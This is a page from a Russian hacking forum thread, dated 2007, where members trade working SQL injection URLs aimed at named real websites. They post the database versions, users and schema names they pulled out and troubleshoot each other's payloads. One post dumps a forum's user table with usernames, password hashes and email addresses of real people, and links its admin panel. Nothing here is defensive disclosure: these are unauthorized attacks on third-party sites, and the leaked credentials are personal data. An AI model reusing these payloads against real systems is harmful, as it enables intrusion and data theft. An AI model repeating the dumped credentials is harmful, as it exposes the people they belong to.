HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 298 из 1602 « Первая < 198248288 294 295 296 297 298 299 300 301 302 3083483987981298 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.09.2007, 23:48
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию
game-ost.ru
4.1.14-log:gameost1_ananii@localhost:gameost1_gameost
Код:
http://www.game-ost.ru/news_comments.php?id=399+UNION+SELECT+1,concat(cast(version()+as+binary),char(58),cast(user()+as+binary),char(58),cast(database()+as+binary)),3,4,5,6,7,8,9,10+from+news+--+
Смог подобрать 2 таблицы: news,articles
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #2  
Старый 05.09.2007, 08:40
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию
http://www.globaltrading.ru/price.php3?Cat_id=1393+union+select+1,2,3,4,5,6,ve rsion(),database(),user(),10,11,12,13,14,version() ,16,17,18,19,20,21,22/*

globalt9_globaltr
4.0.18-log
globalt9_globalt@localhost
_________________
edited:
http://www.goldsteel.ru/catalog.php?tovar_id=123+union+select+1,2,3,4,5,6, 7,concat(user(),char(58),version(),char(58),databa se()),9/*
нет прямого вывода данных -(
_________________
edited2:
http://mag-russia.ru/news.php?id=38'+union+select+1,user(),concat(datab ase(),char(58),version()),4/*
1gb_mag_russia@10.0.1.24
1gb_mag_russia:5.0.24a-community-max-nt-log
//там же и админка.
Последний раз редактировалось Calcutta; 05.09.2007 в 10:06..
 
Ответить с цитированием

  #3  
Старый 05.09.2007, 09:47
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию
edu. Код: http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,2,3,4,5,6/*

help! не могу понять что тут я неправильно делаю код:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,user(),3,4,5,6/*
 
Ответить с цитированием

  #4  
Старый 05.09.2007, 10:38
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию
Цитата:
Сообщение от fobofob  
edu. Код: http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,2,3,4,5,6/*

help! не могу понять что тут я неправильно делаю код:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,user(),3,4,5,6/*
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Выдает эту ошибку на запрос к любой колонке, существующей в базе. выходит стоит какая-то защита, имо.
 
Ответить с цитированием

  #5  
Старый 05.09.2007, 10:48
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию
Цитата:
help! не могу понять что тут я неправильно делаю код:
Вот так пробуй:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),1 ),1),3,4,5,6/*

Или даже так:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,CAST(user()+AS+BINARY),3,4,5,6/*

Это не защита на хосте, это проблема перекодировки из UTF-8.
Последний раз редактировалось groundhog; 05.09.2007 в 10:56..
 
Ответить с цитированием

  #6  
Старый 05.09.2007, 11:27
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию
http://www.watchiki.ru/p/19+union+select+1,2,concat(version(),char(58),data base(),char(58),user()),4,5,6,7/*
4.1.22
k1_tiktak
k1_tiktak@localhost
но почему то у меня постоянная проблема с подбором паролей и е-маилов -( кто может подсказать, или доработать этот скуль?
 
Ответить с цитированием

  #7  
Старый 05.09.2007, 13:56
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию
Уязвимость на крупном украинском портале знакомств:

http://www.ukraineloves.com/search/extend-info.php?girl_id=-1+UNION+SELECT+VERSION(),2,3,4,5,USER(),DATABASE() ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52,53,54--+&photo=1
 
Ответить с цитированием

  #8  
Старый 05.09.2007, 17:32
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию
Код:
http://infoshop.zaraz.org/?r=3&list_exp=-1+union+select+null,null,null,null,concat_ws(char(58),username,password,email),null,null,null,null,null,null,null,null,null+from+phorum_users/*
Код:
admin:3fd07483d0d44301fc0e987a6a517693:phorum@zaraz.org  # z2r2z
magduv:1eaf7c068a250a38e3bab770053c14c3:facilitator@mail.ru
test:098f6bcd4621d373cade4e832627b4f6:test@test.com
жТБХОЗПЖЕТ:bd40cd94a7ccf4b802b1090af055afaa:paz.zapped@ua.fm
Tvorog:11967d5e9addc5416ea9224eee0e91fc:tvaroh@ukr.net  # huy
matvey:7c7d80ae76edbe1c202a4e2baa3c271b:matvey@gmail.com
аккаунты admin и test не активированы

http://phorum.zaraz.org/admin.php
Phorum Admin
version 5.0.5-beta

сам форум и админка
 
Ответить с цитированием

  #9  
Старый 05.09.2007, 17:55
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию
Инъекция в Oracle:

Oracle8i Enterprise Edition Release 8.1.7.4.0 - Production
Цитата:
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =1+--
PL/SQL Release 8.1.7.4.0 - Production
Цитата:
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =2+--
CORE 8.1.7.0.0 Production
Цитата:
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =3+--
TNS for Linux: Version 8.1.7.4.0 - Production
Цитата:
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =4+--
NLSRTL Version 3.4.1.0.0 - Production
Цитата:
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =5+--
 
Ответить с цитированием

  #10  
Старый 05.09.2007, 18:54
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию
Произведение команды Sоlоx

оч интересная базюка
Код:
http://www.flowers.kg/rus/index.php?mode=showother&id=-23+union+select+1,2,concat_ws(0x3a,table_name,table_schema,version(),database()),4+from+information_schema.tables
там еще лежат заготовки к базам всех проектов этой студии ))

хмм, только вот ничо путевого там не нашел
 
Ответить с цитированием
Ответ
Страница 298 из 1602 « Первая < 198248288 294 295 296 297 298 299 300 301 302 3083483987981298 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ